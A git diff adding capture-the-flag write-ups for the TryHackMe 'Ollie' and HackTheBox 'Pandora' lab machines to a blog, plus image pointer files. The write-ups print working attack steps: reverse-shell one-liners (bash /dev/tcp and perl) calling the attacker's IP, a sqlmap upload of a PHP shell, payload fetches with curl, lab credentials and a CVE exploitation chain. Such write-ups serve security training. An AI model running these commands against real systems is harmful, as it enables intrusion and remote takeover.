will download the [nmap binary](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) and upload it in the docker. + + +```bash +daemon@4a70924bafa0:/tmp$ curl 10.8.3.186:81/nmap > nmap + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 5805k 100 5805k 0 0 9740k 0 --:--:-- --:--:-- --:--:-- 9723k +daemon@4a70924bafa0:/tmp$ chmod +x nmap +``` +Je sais que l'ip du docker est 172.17.0.2, il y a donc de forte chance que l'IP de l'hote soit 172.17.0.1. Teston cette IP dans un premier temps : + + +```bash +./nmap 172.17.0.1 -p- +``` +![](img/image-7.webp) + +In addition to ports 22 and 80, I find an unknown port: 5986. 
After some research I quickly find out that this is a port generally used to perform a remote management of Azure machines (Microsoft cloud). + +I found this [site](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/) that indicates a number of CVEs including one that allows a root connection without authentication: CVE-2021-38647. Let's look for a script allowing its exploitation. + +I find this [script](https://github.com/horizon3ai/CVE-2021-38647), which allows to send commands to the host as root. This will allow us to get the last flag : + +![](img/image-8.webp) + +To take control of the host, we just need to retrieve "id\_rsa" contained in the "/root/.ssh" folder and initiate an SSH connection with it. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update Apache +- Do not leave Python with the "CAP\_SETUID" set +- Update OMI to patch CVE-2021-38647 diff --git a/content/writeup-ctf/writeup-ollie-thm/featured.png b/content/writeup-ctf/writeup-ollie-thm/featured.png new file mode 100644 index 0000000..9d71bb1 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cfaf46c59867a962897c7b782bec43c4365d08d3c89b7e521f28f002ae95883e +size 200283 diff --git a/content/writeup-ctf/writeup-ollie-thm/featured.webp b/content/writeup-ctf/writeup-ollie-thm/featured.webp new file mode 100644 index 0000000..9be4e23 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a303e588a4a4dfb05565267f1770d79ef89260291d53db7629e13c182578257e +size 142236 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-1.png b/content/writeup-ctf/writeup-ollie-thm/img/image-1.png new file mode 100644 index 0000000..fee2b67 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-1.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4aef54f1f404885d3489127de15909143f789dac6a90e3f428cb2565170701e6 +size 28485 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp new file mode 100644 index 0000000..919bc81 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e335c867c9728bdc95b39668ebefcb6770bc5b2b3768536aaf08b97e35569e7b +size 26116 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-2.png b/content/writeup-ctf/writeup-ollie-thm/img/image-2.png new file mode 100644 index 0000000..bb1137e --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:26cd9f2d1eedd06e659c78722034a347469771789fc554c966f904fedf899bdd +size 930510 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp new file mode 100644 index 0000000..fbb30c8 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9166b47edf8d9fb1bd13853ed4ca5f6a6e1c4b348485d308f720549039ffd48 +size 80104 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-3.png b/content/writeup-ctf/writeup-ollie-thm/img/image-3.png new file mode 100644 index 0000000..7d0d1b9 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f53e33e357bc63ed82431dd0b7ba0017dd1e019942ec520efed21aca917582e4 +size 2179837 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp new file mode 100644 index 0000000..a7433d3 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff3094bfc6bed3f697e6adbe2b5817604204d8dbedbba61bfea96dc816d88d43 +size 176986 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-4.png b/content/writeup-ctf/writeup-ollie-thm/img/image-4.png new file mode 100644 index 0000000..7be34e8 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0006fe079492d34a80be44c20c27a7d9ddf0dcf1074cdd56dc283e0c8a83ee8e +size 339613 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp new file mode 100644 index 0000000..de06ad9 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3656ef1e6bf62dd96ddcfd9aa6d52c153cc626badfa5bb6576f1dc7c943e0865 +size 46320 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-5.png b/content/writeup-ctf/writeup-ollie-thm/img/image-5.png new file mode 100644 index 0000000..7c5247a --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a94c3fbbbbf653d7768c5dd9f48fd1c2bf250c080f39c4b47486030cb263c79 +size 175016 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp new file mode 100644 index 0000000..d7a36f4 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fce647e8dfcd84db18ec204ef95cebcb7dfd8d5516ce6cf219c4d4fe187a30e4 +size 176006 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-6.png b/content/writeup-ctf/writeup-ollie-thm/img/image-6.png new file mode 100644 index 0000000..13ecdef --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-6.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94ca7c8d669b7ebfecbdd5889de6f7767abdb2db5a58e59ac6c464ce901f37e4 +size 28760 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp new file mode 100644 index 0000000..6c71468 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7546cb116d018ea951ba2eedee3c370d36d319b94814ec7c7862c4e104a031c0 +size 24368 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-7.png b/content/writeup-ctf/writeup-ollie-thm/img/image-7.png new file mode 100644 index 0000000..a2cca07 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e98bf0d68a76bf67c498ef6770447adc50eeb97b06c38182801bd409896dae7 +size 10389 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp new file mode 100644 index 0000000..b9d858e --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6778a7bb09055c83bc98b55677c816b3971d220625bd16fb09ba13ddc3767290 +size 9872 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-8.png b/content/writeup-ctf/writeup-ollie-thm/img/image-8.png new file mode 100644 index 0000000..c957b40 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b6b4a8a33f3605ef81635d52ed3532679a8d6c3935098d147b27fd4545255f0 +size 11042 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp new file mode 100644 index 0000000..53733c4 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec1967348cec7cb392937eb0f26b480f309d43ba9ba5ff023d9edf1c3b0fd242 +size 14112 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-9.png b/content/writeup-ctf/writeup-ollie-thm/img/image-9.png new file mode 100644 index 0000000..ba59a68 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72eb60d5aba874e9bb66afce2f07f825710b5c7954c281a6ae32c71a583a4d20 +size 19720 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp new file mode 100644 index 0000000..06d8dbc --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e75786cfbe23d79383e55073ea396e2d92ae527ce55b2e66d78f40f54e47ae16 +size 19686 diff --git a/content/writeup-ctf/writeup-ollie-thm/index.md b/content/writeup-ctf/writeup-ollie-thm/index.md new file mode 100644 index 0000000..27d9221 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/index.md 
@@ -0,0 +1,159 @@ +--- +title: "Writeup - Ollie (THM)" +date: 2022-04-22 +slug: "writeup-ollie-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Ollie](https://tryhackme.com/room/ollie) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.147.194 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 1337/tcp : Chat and file  sharing (waste) + +![](img/image-2.webp) + +## Exploit + +First of all I connect via netcat to the waste port to see if I can get some information. + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ nc 10.10.147.194 1337 +Hey stranger, I'm Ollie, protector of panels, lover of deer antlers. + +What is your name? azerty +What's up, Azerty! It's been a while. What are you here for? test +Ya' know what? Azerty. If you can answer a question about me, I might have something for you. + + +What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog +You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie... +Please hold on a minute +Ok, I'm back. +After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel. + + Username: admin + + Password: OllieUnixMontgomery! + +PS: Good luck and next time bring some treats! + +``` +After some tests, I find that the chat returns credencials for an admin panel. If I go to the port 80 site, I find a login page, so I test the credencials and it works! + +![](img/image-3.webp) + +This is an administration page based on `phpIPAM 1.4` after some research I find the following exploit : [exploit](https://fluidattacks.com/advisories/mercury/). I try to apply it to see if it works. 
+ +![](img/image-4.webp) + +After following the different steps, the exploit works, so we can now perform SQL injections! To automate the upload process of a php reverse shell I will use `sqlmap`. I start by extracting a query with Burp : + + +```bash +POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1 +Host: 10.10.196.154 +Content-Length: 20 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Sa> +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://10.10.196.154 +Referer: http://10.10.196.154/index.php?page=tools§ion=routing&subnetId=bgp&sPage=2 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: phpipamredirect=%2Findex.php%3Fpage%3Dtools%26section%3Drouting%26subnetId%3Dbgp%26sPage%3D2; phpipam=151l3> +Connection: close + +subnet=test&bgp_id=2 +``` +Then with the following command I send my php file : + + +```bash +sqlmap -r request.txt --file-write=reverse.php --file-dest=/var/www/html/reverse.php --batch +``` +![](img/image-5.webp) + +After running netcat I can access the file and create a reverse shell. + +![](img/image-6.webp) + +After some research I find that a user folder: `ollie`. So I try to change the user with the password I found before: + +![](img/image-7.webp) + +I can now recover the first flag. + + +```bash +ollie@hackerdog:~$ cat user.txt +cat user.txt +THM{Ollie_boi_is_daH_Cut3st} +``` +## Privilege escalation + +I start by running [linpeas.sh](https://linpeas.sh) but I don't find anything interesting. So I try to list the services with [pspy64](https://github.com/DominicBreuker/pspy). 
+ + +```bash +ollie@hackerdog:~$ ./pspy64 +./pspy64 +pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855 + + + ██▓███ ██████ ██▓███ ▓██ ██▓ + ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ + ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ + ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ + ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ + ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ + ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ + ░░ ░ ░ ░ ░░ ▒ ▒ ░░ + ░ ░ ░ + ░ ░ + +Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) +Draining file system events due to startup... +done +[...] +2022/04/13 10:11:43 CMD: UID=0 PID=1355 | python3 -u olliebot.py +[...] +2022/04/13 10:12:04 CMD: UID=0 PID=37813 | /bin/bash /usr/bin/feedme +[...] +``` +In the result of the command I see 2 interesting services executed by the UID=0 i.e. root. The second one is a bash script but without any particular content. But I have write permission. + +![](img/image-8.webp) + +So I add a reverse shell in the file with the following command: + + +```bash +echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> /usr/bin/feedme +``` +Then after a few seconds, I have a reverse shell root and I can recover the last flag. + +![](img/image-9.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not put credentials in a public chat +- Do not use the same password for a session and a web service +- Do not allow scripts executed by root to be writable by other users diff --git a/content/writeup-ctf/writeup-pandora-htb/featured.png b/content/writeup-ctf/writeup-pandora-htb/featured.png new file mode 100644 index 0000000..65151e1 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/featured.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3896e27352033280100dbdaedc10fcea42f1a31a1c5ae3800964e92a7d522f0f +size 278361 diff --git a/content/writeup-ctf/writeup-pandora-htb/featured.webp b/content/writeup-ctf/writeup-pandora-htb/featured.webp new file mode 100644 index 0000000..ed75896 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90bc42a8d6b64b982b879cb8d8bc687f0143df2610e1f60731752cf9bf6b75c7 +size 27134 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-1.png b/content/writeup-ctf/writeup-pandora-htb/img/image-1.png new file mode 100644 index 0000000..4b532b3 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ad28dc81c668f635dcd23a36563670ff499f77e0e5416d13ebde7df480becc8 +size 52933 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp new file mode 100644 index 0000000..d385839 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d6359acfe320430a98508df03316cd083f0697a610c3ca78e99482779d61866 +size 50354 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-10.png b/content/writeup-ctf/writeup-pandora-htb/img/image-10.png new file mode 100644 index 0000000..fdb9cf1 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2158090d6e417aad45b07e63622456db610a47c2e58e299e7382cf3937ff081e +size 22128 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp new file mode 100644 index 0000000..6dd841a --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:860a66b29134bf125aa27a8373647def07d6c2d0409c1ce737397337c992800f +size 21376 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-11.png b/content/writeup-ctf/writeup-pandora-htb/img/image-11.png new file mode 100644 index 0000000..600695c --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c02edc247a4adbd15f6e98f26cd874f695cbd2dce229a7c624085e5c73084df +size 14133 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp new file mode 100644 index 0000000..fe720d0 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71c9abdb537d5872adcca73056445a0ef5af125a39f04d04f6f83297107b3f90 +size 14282 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-2.png b/content/writeup-ctf/writeup-pandora-htb/img/image-2.png new file mode 100644 index 0000000..b8870bf --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95a78c77d0be28aa868c2db45b5f72bfec127432ef6fd642adfa75df541fe301 +size 7799 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp new file mode 100644 index 0000000..292d03e --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e9c9f78705cf78b7f888f3a1afe93a5e78049c8f6dec9afacfd65777e07d553 +size 8626 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-3.png b/content/writeup-ctf/writeup-pandora-htb/img/image-3.png new file mode 100644 index 0000000..8da395a --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-3.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2d8e595183115f1eea997f3d84f00e6b936bd37e30e3d71b9bf4b3dc2c8e5e5 +size 61354 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp new file mode 100644 index 0000000..4cc7139 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2fcf00c893eea9a82351a6a5a33985ae9de2b4232160b0107c1377a6f2a3f411 +size 52110 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-4.png b/content/writeup-ctf/writeup-pandora-htb/img/image-4.png new file mode 100644 index 0000000..2d63b92 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c49b39eff68e54203094258b6488adf59f093e2c846743c2a38d57e53b9a89d0 +size 109159 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp new file mode 100644 index 0000000..4eeb0b1 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6120c24b0a5b7b4ec6529e1df0f204582ebe8f9f9d9139d6a7a64d50ed2e005f +size 101174 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-5.png b/content/writeup-ctf/writeup-pandora-htb/img/image-5.png new file mode 100644 index 0000000..cf65233 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8dcfc3fd6f0c9474c00ef9ae02bded796c996bc31f9e7f4417dbe99eca26a3e +size 44176 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp new file mode 100644 index 0000000..729f63f --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5294b47c545b951d6d9494b34c6fceff04c67af75f55a56c1e85024151f3d968 +size 34726 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-6.png b/content/writeup-ctf/writeup-pandora-htb/img/image-6.png new file mode 100644 index 0000000..fdc8efc --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af47c01bf4985201766f2f5a2d5d75080a1e5ef0db4a90d00502afe69560e18c +size 791135 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp new file mode 100644 index 0000000..b514e98 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:facc4dc10ad098bee58ef5baceb933b43adebe9d3bfa7ccd87a7be0ca4bcb0cb +size 107802 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-7.png b/content/writeup-ctf/writeup-pandora-htb/img/image-7.png new file mode 100644 index 0000000..6e2bf37 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6878c0969b5722a1762dad207b6b0d1bf00b78d8df6450ffe71f8eab0f0f00d9 +size 40049 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp new file mode 100644 index 0000000..0c5f4d6 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb0e71d67788ef3d3c4024bbd35b54e9c6a7b2e2c08ed51b06848c620eea216b +size 33010 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-8.png b/content/writeup-ctf/writeup-pandora-htb/img/image-8.png new file mode 100644 index 0000000..bc03c99 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-8.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8e5e32898c0a9eac34267adf5a404d69fb5c3472fa5e81cda6bb85c73aaf281 +size 28511 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp new file mode 100644 index 0000000..446e50f --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd980bff7a5970ee308ffb742a2497f3c9f25354f5d8d48a9a274344104c4dd1 +size 28604 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-9.png b/content/writeup-ctf/writeup-pandora-htb/img/image-9.png new file mode 100644 index 0000000..657bf93 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a6d5299989c77099dbd9deb56714d829ae86b7679a7987c1e4053ad46f1a00b9 +size 54089 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp new file mode 100644 index 0000000..6e15616 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ec854af17d172738fb5c862e93836159affb78295e0665d3df0fc97f233d05a +size 43834 diff --git a/content/writeup-ctf/writeup-pandora-htb/index.md b/content/writeup-ctf/writeup-pandora-htb/index.md new file mode 100644 index 0000000..e8fb09c --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/index.md 
@@ -0,0 +1,162 @@ +--- +title: "Writeup - Pandora (HTB)" +date: 2022-04-12 +slug: "writeup-pandora-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Pandora](https://app.hackthebox.com/machines/Pandora) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.136 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +In addition to these two ports, a UDP scan reveals a third port: + + +```bash +sudo nmap -sU 10.10.11.136 +``` +![](img/image-2.webp) + +So we discovered 3 open ports, the two TCP ports are quite common (SSH and HTTP) they are services often open to the outside. But the SNMP port is not common. It is generally a service that stays in the local network and is not intended to be accessible from outside. + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : web server (Apache 2.4.41) +- 161/udp : snmp server (SNMPv1) + +So I will start by looking for exploits related to the SNMP port. + +## Exploit + +After some research in Metasploit modules, I find "auxiliary/scanner/snmp/snmp\_enum". This module allows to get via SNMP a lot of information about our target. + +We find for example the open ports on the target PC: + +![](img/image-3.webp) + +A little further down we find the list of services that run on the machine, and in this list we find the following service: + + +```bash +829 runnable sh /bin/sh -c sleep 30; +/bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23' +``` +This service, although ordinary, has two very interesting attributes: -u and -p. A User and a Password ! Being a user of our target machine it is possible that we could connect via SSH with these credentials... BINGO, we are connected! + +![](img/image-4.webp) + +After some research, I find a file "user.txt" in the user folder of "matt". But I don't have the permission. I will have to find a way to change the user. 
+ +To start I scan the machine for potential exploit with the [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script. + +To do this after hosting the script on a web server with the command: + + +```bash +sudo python3 -m http.server 81 +``` +I can then wget the file and add the execution rights: + +![](img/image-5.webp) + +After some research in the script result, I notice that a page "pandora\_console" is hosted on a site accessible only by local users. + +To access it remotely, I will do an SSH port forwarding with the following command: + + +```bash +ssh -L 8082:127.0.0.1:80 -N daniel@10.10.11.136 +``` +We can now access the site with the following address "127.0.0.1:8082/pandora\_console/" we arrive on the following site: + +![](img/image-6.webp) + +After some research I find the Pandora exploit [CVE-2021-32099](https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained/) and more particularly the following script which allows via the admin session cookie the creation of a shell. + +[GitHub - shyam0904a/Pandora\_v7.0NG.742\_exploit\_unauthenticated: Unauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shellUnauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shell - GitHub - shyam0904a/Pandora\_v7.0NG.742\_exploit\_unauthenticated: Unauthentic...![](https://github.com/fluidicon.png) + +{{< github repo="shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated" >}} + +After executing the script, we can retrieve the first flag which is the matt flag: + +![](img/image-7.webp) + + +```bash +CMD > cat /home/matt/user.txt +285476d908ea2c455c35d028d52969b3 +``` +Now I will try to create a reverse shell a little better to do the privilege elevation. 
For that I test a number of commands from this [github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md). After about ten tests, I finally find one that works: + + +```bash +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.14.246:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +I do a shell upgrade with the following command: + + +```bash +python3 -c 'import pty;pty.spawn("/bin/bash")' +``` +I now have a clean shell with the user matt. + +![](img/image-8.webp) + +## Privilege escalation + +For the elevation of privilege I re-run the [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script and look for vulnerabilities to explore. The first one I found is the CVE-2021-4034 which allows the switch in root. No luck the host does not have gcc. I'll look for something else... + +I then list the commands that can be executed by everyone but that run with high privilege: + + +```bash +find / -perm -u=s -type f 2>/dev/null +``` +![](img/image-9.webp) + +I then search for matches on the [GTFOBins](https://gtfobins.github.io) site and find an interesting exploit allowing to remove the restrict shell with the command "at": + + +```bash +echo "/bin/sh <$(tty) 